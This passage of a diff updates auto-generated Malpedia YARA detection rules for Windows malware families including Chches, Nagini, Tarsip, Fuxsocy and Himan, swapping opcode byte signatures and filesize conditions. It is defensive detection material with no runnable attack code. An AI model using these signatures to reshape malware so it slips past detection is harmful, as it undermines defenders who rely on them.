+		$sequence_57 = { ffd7 ff750c ff15???????? a810 }
+		$sequence_58 = { 89450c ff15???????? 3bc3 8945f4 741a ff750c 668918 }
+		$sequence_59 = { 50 83c604 e8???????? 3bfb 7414 a1???????? }
+		$sequence_60 = { 8bd7 e8???????? eb02 33c0 3bc3 741b }
+		$sequence_61 = { 3bc3 7406 50 e8???????? 3bfb 7414 }
+		$sequence_62 = { 6641b85c00 33d2 488bcd ff15???????? }
+		$sequence_63 = { ba08000000 b90e010000 41b800000100 4889442420 e8???????? e9???????? }
+		$sequence_64 = { e8???????? 85db 7423 8b0d???????? }
+		$sequence_65 = { ff15???????? 488bdf 8bf7 483bdf 7508 }
+		$sequence_66 = { 85c0 0f84dc000000 8b45e0 8d4de0 3bc1 0f84ce000000 eb03 }
+		$sequence_67 = { 4883c608 83fd05 72c1 eb0c bb7f000000 eb05 }
+		$sequence_68 = { 57 ff750c 53 e8???????? 3bfe 740e }
+		$sequence_69 = { 8b4330 a804 0f8451ffffff 8b470c }
+		$sequence_70 = { e8???????? 85c0 0f8586000000 8b4720 8b4e04 6a00 }
+		$sequence_71 = { 0f84e2000000 8b7334 8d442418 50 8d442410 50 e8???????? }
+		$sequence_72 = { 8b8c2490000000 83bc248800000000 4c8b442440 488b542448 }
+		$sequence_73 = { ff75fc 56 ff35???????? ff15???????? 53 56 }
+		$sequence_74 = { 83632800 e9???????? 8b4330 a840 0f84e2000000 8b7334 }
+		$sequence_75 = { 752e 53 e8???????? 6a01 }
+		$sequence_76 = { 8b7508 e8???????? 33f6 3975fc 7410 ff75fc }
+		$sequence_77 = { 0f854affffff 894330 e9???????? 55 }
+		$sequence_78 = { 85ff 0f845d010000 8b4730 a808 7412 }
+		$sequence_79 = { c744242000010000 ff15???????? 4883f8ff 488bf8 7442 }
+		$sequence_80 = { ff35???????? 8945f8 ff15???????? 8bd8 3bde }
+		$sequence_81 = { e8???????? 3bfe 740e 57 56 ff35???????? ff15???????? }
+		$sequence_82 = { ff15???????? 53 56 ff35???????? ff15???????? 5b }
+		$sequence_83 = { 53 e8???????? 85c0 0f8544010000 8b472c a801 }
+		$sequence_84 = { ff5214 8bf7 8bfe e8???????? 5f 5e 5b }
+		$sequence_85 = { ff15???????? 4885db 740c 4c8b0d???????? e9???????? }
+		$sequence_86 = { e8???????? 85c0 7507 33db 895d08 }
+		$sequence_87 = { ff15???????? 488bcf 48870d???????? 483bcf 7405 e8???????? ba01000000 }
+		$sequence_88 = { 33d2 ff15???????? 483bc3 4c8be8 }
+		$sequence_89 = { 85d2 4d8bf1 458bf8 8bc2 }
+		$sequence_90 = { 50 57 e8???????? e9???????? 68???????? }
+		$sequence_91 = { c9 c20400 51 56 ff74240c }
+		$sequence_92 = { 8a4b1c 488b4558 4c8b4d30 4c8b4510 }
+		$sequence_93 = { e8???????? 8d45fc 50 8b4508 e8???????? 85c0 }
+		$sequence_94 = { 33d2 498bcc 498bfd e8???????? 493bc5 7405 }
+		$sequence_95 = { 33d2 ff15???????? 8b05???????? 418bdd }
+		$sequence_96 = { 410fb64101 33d2 488d0cc3 48890d???????? }
+		$sequence_97 = { 6a00 ff35???????? ff15???????? 33db 6a01 e8???????? }
+		$sequence_98 = { 448be8 418b4310 41394308 410f474308 }
+		$sequence_99 = { 48890d???????? 410fb64102 488d0cc3 48890d???????? }
+		$sequence_100 = { 488bce ff15???????? 488b0d???????? 33d2 4c63c0 }
+		$sequence_101 = { c3 418bd8 4803df 410fb64101 }
+		$sequence_102 = { 48890d???????? 410fb64103 488d0cc3 48890d???????? }
+		$sequence_103 = { 33db 895d08 eb03 8b5d08 }
+		$sequence_104 = { 5b c3 a1???????? 83c040 50 ff15???????? }
+		$sequence_105 = { 33442410 8bf0 8932 83c204 ff4c240c 75e6 }
+		$sequence_106 = { 8bf1 05fefeffff 33db 33c9 }
+		$sequence_107 = { ff15???????? 8ac3 5b c9 c20400 53 }
+		$sequence_108 = { 0f8386000000 488b18 8364245800 33c0 21442450 }
+		$sequence_109 = { 53 53 53 53 ff7614 }
+		$sequence_110 = { 8b02 43 8acb d3c0 33c6 33442410 8bf0 }
+		$sequence_111 = { 8b3d???????? 56 ffd7 53 56 }
+		$sequence_112 = { c9 c20400 53 56 8bf0 8a06 }
+		$sequence_113 = { 83c204 ff4c240c 75e6 5e 5b c20800 }
+		$sequence_114 = { 41b905000000 488bd8 ff15???????? 488bcb }
+		$sequence_115 = { 741d 3dd2100000 7416 a1???????? 83c004 }
+		$sequence_116 = { 6a00 ff35???????? ffd3 8bd8 85db 7476 }
+		$sequence_117 = { 754f 488d4c246c 66ba2e00 ff15???????? 488bf0 }
+		$sequence_118 = { e9???????? 33c9 bb26040000 48870d???????? 4885c9 }
+		$sequence_119 = { 488bce ff15???????? 4c8d4c2450 4c8d442458 }
+		$sequence_120 = { ff15???????? 488d542440 488bcd ff15???????? 4883f8ff 4c8be0 }
+		$sequence_121 = { 33d2 ff15???????? 33ff 4885ff }
+		$sequence_122 = { 4c8d442458 8d5001 488bce e8???????? 85c0 }
+		$sequence_123 = { 4533c9 4889442428 215c2420 4533c0 }
+		$sequence_124 = { ff15???????? 488bf0 488d44246c 2bf0 443bf3 8bc3 7408 }
+		$sequence_125 = { 8d442430 50 8d442428 50 8d442428 50 }
+		$sequence_126 = { 4883f8ff 4c8be0 0f8583000000 488b0d???????? }
+		$sequence_127 = { 488bd6 ff15???????? eb14 488b0d???????? }
+		$sequence_128 = { 3bc3 7fbd 83c701 e9???????? 488b8424c8010000 498bcc bb01000000 }
+		$sequence_129 = { 458be0 bb08000000 e8???????? 85c0 }
+		$sequence_130 = { b922010000 e9???????? b90a010000 e9???????? }
+		$sequence_131 = { 53 56 8bf1 05fefeffff }
+		$sequence_132 = { 215c2420 4533c9 4533c0 33d2 ff15???????? 85c0 7511 }
+		$sequence_133 = { 803f2a 750b 4883c701 83c3ff }
+		$sequence_134 = { e9???????? 488bcb ff15???????? a810 }
+		$sequence_135 = { 458bc4 418bcd e8???????? e9???????? b909010000 e9???????? }
+		$sequence_136 = { 488bc8 ff15???????? 8b05???????? 3d2caedb8b }
+		$sequence_137 = { a1???????? 25efff0000 0bc2 e9???????? }
+		$sequence_138 = { 41be01000000 33c9 418bd6 ff15???????? }
+		$sequence_139 = { 4c63c0 33d2 4983c00c ff15???????? }
+		$sequence_140 = { 895df4 895df0 c745f857000000 bf19010000 }
+		$sequence_141 = { 7520 41390424 741a 498d4c2401 }
+		$sequence_142 = { ff15???????? 488b0d???????? 448bc0 8bd8 33d2 4983c001 }
+		$sequence_143 = { 6a03 8935???????? 8935???????? 8935???????? }
+		$sequence_144 = { 5f c20400 55 8bec 83e4f8 81ec9c000000 }
+		$sequence_145 = { 53 8bc7 e8???????? 8d4618 8b08 50 }
+		$sequence_146 = { 5e 33c0 c9 c20400 55 8bec 51 }
+		$sequence_147 = { 44892d???????? e9???????? 4533c0 33d2 33c9 e8???????? e9???????? }
+		$sequence_148 = { 750a 488bcf e8???????? 8bd8 488b0d???????? }
+		$sequence_149 = { 488d542438 488bcb e8???????? eb02 }
+		$sequence_150 = { 57 4154 4155 4156 4883ec50 488bf1 }
+		$sequence_151 = { ff7508 8bc6 e8???????? 8b06 8b08 57 }
+		$sequence_152 = { 488b0d???????? 4889040f 4883c708 492bf6 }
+		$sequence_153 = { 6a20 40 50 ffd6 }
+		$sequence_154 = { 488bcb ff15???????? 8bc8 ff15???????? 21b42410020000 }
+		$sequence_155 = { c3 488d82204a0000 488982284a0000 488900 }
+		$sequence_156 = { 458bc4 418bcd e8???????? 8b842410020000 4c8d9c24f0010000 498b5b28 }
+		$sequence_157 = { 21442428 488b8c2428020000 488364242000 448d4803 4533c0 488bd3 }
+		$sequence_158 = { 33d2 ff15???????? 83bc241002000000 7416 488d942410020000 }
+		$sequence_159 = { 7424 3d5c80689f 740c 44892d???????? e9???????? }
+		$sequence_160 = { 7417 4863461c 2b6e1c 4c03e8 488b4610 48894718 4883661000 }
+		$sequence_161 = { 7412 ff7508 e8???????? eb03 33c0 }
+		$sequence_162 = { 33ed 57 3bc5 740c }
+		$sequence_163 = { 7405 e8???????? 4883c428 c3 488d82204a0000 }
+		$sequence_164 = { 4155 4881ecf0010000 33f6 33c0 }
+		$sequence_165 = { 4533c0 488bd3 ff15???????? 488b8c2428020000 }
+		$sequence_166 = { e8???????? 85c0 0f85e8000000 488b4608 488b0e 4533c9 }
+		$sequence_167 = { e8???????? 488b0d???????? 4c8bc3 33d2 ff15???????? 488b0d???????? 4c8bc7 }
+		$sequence_168 = { 84c0 0f89a3000000 8b434c a804 }
+		$sequence_169 = { 488d4c2430 448bcf 4533c0 e8???????? 483bc3 488905???????? 0f8403010000 }
+		$sequence_170 = { 85c0 0f8561010000 8b4348 a801 742c 488b0b }
+		$sequence_171 = { e8???????? 85c0 0f859b000000 4863533c 488b4608 488b0e 48035334 }
+		$sequence_172 = { 33d2 33c9 e8???????? 85c0 0f8561010000 8b4348 }
+		$sequence_173 = { 217b3c eb0b 8b434c 84c0 0f89a3000000 }
+		$sequence_174 = { ffc1 807c043000 7531 8bd3 }
+		$sequence_175 = { ba10000000 488bc8 e8???????? 48898424e0010000 }
+		$sequence_176 = { 488bf8 4885c0 7427 488d542420 }
+		$sequence_177 = { 8bd8 85c0 0f85f3010000 4c8b842418020000 8d5808 488d8c24b0000000 }
+		$sequence_178 = { 488d542420 b901020000 ff15???????? 85c0 }
+		$sequence_179 = { 488bcd 89442428 488b842410020000 4889442420 e8???????? 8bd8 }
+		$sequence_180 = { 488d542448 488bc8 458bf9 33ff e8???????? 4c8be8 4885c0 }
+		$sequence_181 = { 4c89642448 ff15???????? 8bd8 83f8ff }
+		$sequence_182 = { 4c8be8 4885c0 7508 8d5f08 e9???????? 8b842420020000 4c8b442440 }
+		$sequence_183 = { 7451 0fb70b 0fb76b02 0fb7d1 01f2 6683f9ff 896c2428 }
+		$sequence_184 = { 896c2428 7508 8b5304 83c304 01f2 8b4c241c }
+		$sequence_185 = { 40 c1ca08 e2e4 c9 c20c00 83ec10 53 }
+		$sequence_186 = { 0fb6ca 01cb 30c9 eb59 8b4c242c 0fb6d0 01d1 }
+		$sequence_187 = { 56 90 57 51 8b742420 8b7c241c }
+		$sequence_188 = { 56 57 51 90 8b742428 8b7c2424 8b4c2420 }
+		$sequence_189 = { 01d5 01d3 b101 3b5c2428 0f8266ffffff }
+		$sequence_190 = { 83e603 750c 8b5d10 6601da }
 
 	condition:
-		7 of them and filesize < 10952704
+		7 of them and filesize < 2940928
 }
-rule MALPEDIA_Win_Unidentified_020_Cia_Vault7_Auto : FILE
+rule MALPEDIA_Win_Chches_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "29c37aae-f59e-5de0-b472-49827a85b93b"
+		id = "d15a52b4-77ce-52c4-a76e-32aad2b4034d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_020_cia_vault7_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chches_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "e7a70ab9b6a509f80d931123c1a82d7625f8b02d536427c2ae108e65b04e2ebe"
+		logic_hash = "826aac443fa892955ee21ee159179cf79234b9fe8bb8add3f0a9151151666203"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90165,32 +90504,32 @@ rule MALPEDIA_Win_Unidentified_020_Cia_Vault7_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b0d???????? 69c960ea0000 51 e8???????? }
-		$sequence_1 = { 83c404 c70200000000 56 8b35???????? ffd6 8b45b8 }
-		$sequence_2 = { 7461 6a01 53 e8???????? }
-		$sequence_3 = { 50 8d8c242c060000 51 68???????? 8d94242c040000 }
-		$sequence_4 = { c3 53 57 81faffff0000 7657 8b7e20 }
-		$sequence_5 = { 6800400000 50 57 ff15???????? eb4f 8d0c4a }
-		$sequence_6 = { 5f 8be5 5d c3 8b4dfc 51 ff15???????? }
-		$sequence_7 = { 7506 b805000000 c3 3b8a7c120000 }
-		$sequence_8 = { 8bf0 57 56 895dfc e8???????? }
-		$sequence_9 = { 5e 5d c20400 57 be02000000 e8???????? }
+		$sequence_0 = { 83fbff 0f84a6000000 8b4d14 8bc7 23c1 83f8ff 7506 }
+		$sequence_1 = { 89441104 8b550c 8b4a04 8b5668 53 51 50 }
+		$sequence_2 = { 747a 8b16 8b4244 8b4010 85c0 7454 3903 }
+		$sequence_3 = { 8b543bfc 8b4218 51 8b4e68 50 ffd1 }
+		$sequence_4 = { 8b07 895810 8b0f 83c114 3bcb 0f8481000000 8b5508 }
+		$sequence_5 = { 81c71d051101 53 897de0 c745fc00000000 e8???????? 83c404 8945c4 }
+		$sequence_6 = { 3b08 7516 ff8fcc000000 8b5644 50 6a00 ffd2 }
+		$sequence_7 = { c6857bffffff3a c6857cffffff2a c6857dffffff50 c6857effffffca c6857fffffffe9 c64580ab c64581ec }
+		$sequence_8 = { ffd0 8b0b c1e104 8907 03c1 0f849d000000 8b550c }
+		$sequence_9 = { 8b45bc 8b7de8 83c408 c745fc01000000 8b9680000000 50 ffd2 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Azov_Wiper_Auto : FILE
+rule MALPEDIA_Win_Nagini_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3b7f586d-ba57-5a04-8f68-255a064cb459"
+		id = "36bcfb0a-2346-546a-ae2c-0b00cc2618a0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.azov_wiper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.azov_wiper_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nagini_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "011364438eb01e088c781e3c84797626beea4dfb11a3cc9222e67a61e76881e5"
+		logic_hash = "0c83f5c5996fc3fecace2eca42d157da471f759617384a5504d89fe38e4a9faf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90204,32 +90543,32 @@ rule MALPEDIA_Win_Azov_Wiper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d942460020000 488d4c2430 488b00 ff9078010000 488b3d???????? f20f10842460020000 488b4710 }
-		$sequence_1 = { 4831f6 4801c6 4883c03c 4831d2 8b10 4883ec08 }
-		$sequence_2 = { 488d144a 66833a5c 740b 4883ea02 83c0ff }
-		$sequence_3 = { 488bf1 498943c8 498d7bc8 488d055ffbffff 33db 498943d0 }
-		$sequence_4 = { 488b05???????? bafe010000 488bd9 33f6 4c8b00 41ff9048010000 ffc8 }
-		$sequence_5 = { 0f1f4000 488938 48897808 48897810 488d4040 }
-		$sequence_6 = { 41ff9258010000 488b8c2470080000 4885c9 7410 488b05???????? 488b10 ff9268010000 }
-		$sequence_7 = { 448d4904 41ff5208 4c8bc8 4885c0 }
-		$sequence_8 = { ffc0 8bc8 488d156cfaffff 4c8d0409 }
-		$sequence_9 = { 488d05acf3ffff 4883ec08 48890c24 48c7c1619afeff }
+		$sequence_0 = { 06 0c07 06 0c07 06 0b06 }
+		$sequence_1 = { e9???????? 6683f803 0f85c1020000 6804010000 8d842474010000 33f6 50 }
+		$sequence_2 = { 0f835ffbffff 03f3 03d3 83fb1f 0f8715040000 ff249da0c64000 8b46e4 }
+		$sequence_3 = { 1408 0412 06 0213 07 0315???????? }
+		$sequence_4 = { 59 8975fc 8b45e0 8b0485c0914200 f644030401 7428 }
+		$sequence_5 = { ffd3 33c0 c744244007000000 c744243c00000000 668944242c 663907 }
+		$sequence_6 = { 8d4c2448 e8???????? 83c404 c68424d802000006 83781408 7202 8b00 }
+		$sequence_7 = { 0305???????? 0305???????? 0404 0404 }
+		$sequence_8 = { 0203 0903 040d 05060d0506 0d05060a04 }
+		$sequence_9 = { 83f85b 741d 83f85c 7418 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 12820480
 }
-rule MALPEDIA_Win_Zlob_Auto : FILE
+rule MALPEDIA_Win_Tarsip_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a970d088-9ed2-5a54-a209-a213c278b939"
+		id = "ee7f1e65-623e-5bf6-9501-f2cb0191dbfa"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zlob"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zlob_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tarsip_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "7be20af316e82ae77a28c9d29b76181384335b1dbce3a98db4ea9d8cea904efb"
+		logic_hash = "250b7ade9271df7a85ec6b855f6cf5a10251a0f1952bae0fcefa6519af030f1e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90243,32 +90582,32 @@ rule MALPEDIA_Win_Zlob_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d442434 50 c64424385e c644243924 }
-		$sequence_1 = { 47 83ff10 7c9b 5f 5e }
-		$sequence_2 = { ffd7 ffd6 ffd6 ffd7 8b4d08 034c241c 8d442410 }
-		$sequence_3 = { 7415 6a01 68???????? 8bc8 e8???????? a3???????? eb07 }
-		$sequence_4 = { ffd7 ffd6 ffd7 ffd6 ffd6 ffd7 8d85f0eeffff }
-		$sequence_5 = { ffd6 ffd6 ffd7 8b0d???????? 8d442424 50 e8???????? }
-		$sequence_6 = { c685f5feffff61 c685f6feffff63 c685f7feffff34 c685f8feffff66 c685f9feffff36 c685fafeffff39 }
-		$sequence_7 = { ffd6 ffd7 5f 5e 5d 5b 81c494180000 }
-		$sequence_8 = { 50 6a00 ff742420 6802660000 ff742420 }
-		$sequence_9 = { 8b4c2418 ff742428 ff7118 ff7114 52 }
+		$sequence_0 = { 899c2464420100 899c2468420100 8d442410 50 899c2484420100 e8???????? }
+		$sequence_1 = { bdc40f0000 897c240c 393e 0f868d010000 53 }
+		$sequence_2 = { 52 ba???????? 8bcf e8???????? 8d8424ac000000 50 e8???????? }
+		$sequence_3 = { 889c24c8020000 e8???????? 8b35???????? 83c40c 6804010000 8d8424c0020000 50 }
+		$sequence_4 = { 8d4c2414 68???????? 51 e8???????? 8b8618420100 83c41c 68000000a0 }
+		$sequence_5 = { 8b442410 50 e8???????? 83c404 b801000000 8b8c242c010000 64890d00000000 }
+		$sequence_6 = { 53 55 57 33db 8d8e907e0000 bd73020000 }
+		$sequence_7 = { eb6d 8b3f ebdc 8b8424ac000000 50 55 }
+		$sequence_8 = { c78424c8070000ffffffff c74424700f000000 895c246c 885c245c 39b4248c000000 720d 8b4c2478 }
+		$sequence_9 = { 52 e8???????? 83c414 eb10 6a0a 8d542404 52 }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Holerun_Auto : FILE
+rule MALPEDIA_Win_Fuxsocy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8b68b52e-fb5a-5ecc-88ef-a3ed80a6122b"
+		id = "9b163b74-81fa-5d1f-8fcc-0d3d39882b0f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.holerun"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.holerun_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuxsocy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fuxsocy_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "f543cc584969255e8ee0247544f45390194f0e1121bcb76269aa2fe3a672745b"
+		logic_hash = "7f8e495acd118755a8b2612e1d92bc28ab4a40bb2e7047fd4133b89e103973ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90282,32 +90621,32 @@ rule MALPEDIA_Win_Holerun_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d05df640000 890c02 488345f801 48837df81f }
-		$sequence_1 = { 488b05???????? ffd0 c785a8fdffff38000000 31c0 8985acfdffff 488985b0fdffff 488985b8fdffff }
-		$sequence_2 = { 488b05???????? 8b00 83f801 7520 488b15???????? }
-		$sequence_3 = { 4883c420 5d c3 55 4889e5 4883ec40 894d10 }
-		$sequence_4 = { 488b45f8 4801d0 488945f0 488b45f0 8b00 3d50450000 740a }
-		$sequence_5 = { 4801c8 4889c1 488b55b8 488b45a0 4989c9 41b840000000 4889c1 }
-		$sequence_6 = { c744242000000000 41b902000000 4989c8 4889c1 488b05???????? }
-		$sequence_7 = { 4889c2 8b4d10 e8???????? 8945fc }
-		$sequence_8 = { 488b45f0 4883c018 488945e8 488b45e8 }
-		$sequence_9 = { 488d15c1400000 4889c1 e8???????? e9???????? }
+		$sequence_0 = { 8b7c2410 eb0b 8a03 8807 47 }
+		$sequence_1 = { 83c40c c3 83ec0c 33d2 53 55 }
+		$sequence_2 = { 8bcf e8???????? 59 59 ff742434 88442417 53 }
+		$sequence_3 = { e8???????? 8b4c2410 8bf0 33c0 50 50 }
+		$sequence_4 = { 53 ff15???????? 55 6a00 ff15???????? 5f 5e }
+		$sequence_5 = { c744246804000000 894c2464 894c2450 ff15???????? 85c0 }
+		$sequence_6 = { 8d8c2468020000 e8???????? 59 84c0 0f8462010000 55 6850020000 }
+		$sequence_7 = { 8975e4 85f6 7426 8365fc00 57 53 }
+		$sequence_8 = { 8b442410 5e 5d 8901 8b44240c 5b }
+		$sequence_9 = { c20400 83ec18 56 89542414 66894c2406 e8???????? 8bf0 }
 
 	condition:
-		7 of them and filesize < 156672
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Apocalipto_Auto : FILE
+rule MALPEDIA_Win_Findpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "58f415e5-91b6-56af-81ea-f9ae50f28789"
+		id = "0a568c8d-936e-5180-b48c-3459a7de3f2c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.apocalipto_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.findpos_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "48ade2c833b72b6d2d3dc07dbbdbc3c6fed84013a5bea316066eb8c372c170b2"
+		logic_hash = "16968f111dc679e93555d1d3b7ae27dea3f4769dc763c7bf583a162ef6a1f34f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90321,32 +90660,32 @@ rule MALPEDIA_Win_Apocalipto_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 31d2 90 8a0c16 880c10 42 39d3 }
-		$sequence_1 = { 893424 ff15???????? 57 8b85c8feffff 8d65f4 }
-		$sequence_2 = { 89442408 8b4310 89442404 8d85e0f3ffff 890424 e8???????? }
-		$sequence_3 = { 85c0 0f845a090000 c7442404???????? 891c24 ff15???????? 83ec08 a3???????? }
-		$sequence_4 = { 40 3d00010000 75f4 31ff 31c9 }
-		$sequence_5 = { 890424 ff15???????? 83ec0c 85c0 7504 31c0 }
-		$sequence_6 = { 83ec08 a3???????? 85c0 0f8480070000 c7442404???????? }
-		$sequence_7 = { 29f2 89542404 893c24 e8???????? c745e400000000 }
-		$sequence_8 = { 8b463c 8d1406 895580 8d8406f8000000 0fb74a06 85c9 0f8456020000 }
-		$sequence_9 = { 83ec08 a3???????? 85c0 0f843b0b0000 c7442404???????? 891c24 ff15???????? }
+		$sequence_0 = { e8???????? 59 8b45f4 03c3 8945f4 }
+		$sequence_1 = { 59 8b45f4 03c3 8945f4 2bfb }
+		$sequence_2 = { 8b4514 40 c745ec325a4000 894df8 8945fc 64a100000000 }
+		$sequence_3 = { 53 8b5d10 56 57 8b3d???????? 6a3c }
+		$sequence_4 = { 8d7608 660fd60f 8d7f08 8b048d28544000 ffe0 }
+		$sequence_5 = { 51 8b8de8fbffff 8d95ecfbffff e8???????? 83c40c 85c0 743c }
+		$sequence_6 = { 50 50 8d85f8feffff 50 68???????? }
+		$sequence_7 = { 8ac6 243f 884dfa 8845fb }
+		$sequence_8 = { 6803000010 56 ff15???????? 83f8ff 0f8481000000 8b45f8 }
+		$sequence_9 = { 85c0 7429 8bbdf4efffff 33f6 c1ef02 85ff 741a }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Cruloader_Auto : FILE
+rule MALPEDIA_Win_Himan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "af447408-0b7c-5bac-a78b-97c116da2002"
+		id = "43abb682-bd1a-5c0e-aa2b-b956d3c70fcc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cruloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cruloader_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.himan_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "59193418b12a936adb7da239534987c20e49170078a9b714faec730fae8ac983"
+		logic_hash = "30040eb81b0c6b577d494b8638c7a8a804b8dda803c9d87443634bca63af8301"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90360,32 +90699,32 @@ rule MALPEDIA_Win_Cruloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 75e6 ff7588 ff15???????? 57 ff15???????? 8b4dfc 8bc3 }
-		$sequence_1 = { 894de0 c745e404324100 e9???????? c745e003000000 c745e410324100 }
-		$sequence_2 = { ffd0 8d4598 50 e8???????? 83c404 a3???????? 3b4594 }
-		$sequence_3 = { 56 8b35???????? 85f6 7420 6bc618 57 8db8f05b4100 }
-		$sequence_4 = { d9c9 d9f1 833d????????00 0f851c0e0000 8d0db02f4100 ba1b000000 }
-		$sequence_5 = { ffb504fdffff ffb5e4fcffff ffd7 8945e8 85c0 7536 ff15???????? }
-		$sequence_6 = { 56 57 8d3c856c5c4100 8b07 83ceff 3bc6 }
-		$sequence_7 = { c78518fdffff02000100 bac1b99e64 33c9 e8???????? }
-		$sequence_8 = { ba4c009781 33c9 8bf0 e8???????? babf676bbc 8985bcfdffff 33c9 }
-		$sequence_9 = { 8dbd9cfdffff 2bd6 83c7fe 0f1f4000 668b4702 83c702 }
+		$sequence_0 = { 330c9d94886e00 8b58f0 33cb 8bdf c1eb10 81e3ff000000 895c2438 }
+		$sequence_1 = { 8bd6 c1ea10 81e2ff000000 c1ed18 8b1495bcc26e00 3314adbcc66e00 8b2c9dbcbe6e00 }
+		$sequence_2 = { 81e1ff000000 c1eb08 8b0c8d94906e00 81e3ff000000 330c9d948c6e00 8bde c1eb18 }
+		$sequence_3 = { 8b75f4 8bd1 8d7dfc c1e902 }
+		$sequence_4 = { 8d8dbcfbffff 51 ffd3 8bf0 46 8d0436 83c003 }
+		$sequence_5 = { 55 56 57 b910000000 33c0 8d7c246c }
+		$sequence_6 = { c1ea02 83e23f a4 7c0b 83fa40 7d06 8a541428 }
+		$sequence_7 = { 8b542444 8d0c00 8b442410 51 53 6a01 }
+		$sequence_8 = { 50 ff15???????? 8d4c246c 68???????? }
+		$sequence_9 = { c21800 8b4514 50 ff15???????? 33c0 8da5b0f3ffff }
 
 	condition:
-		7 of them and filesize < 196608
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Plead_Auto : FILE
+rule MALPEDIA_Win_Karius_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6ebeecb3-22ba-51cf-8f7b-acfcb3488d30"
+		id = "bdd5efaf-1311-50f9-afba-26e352ee7308"
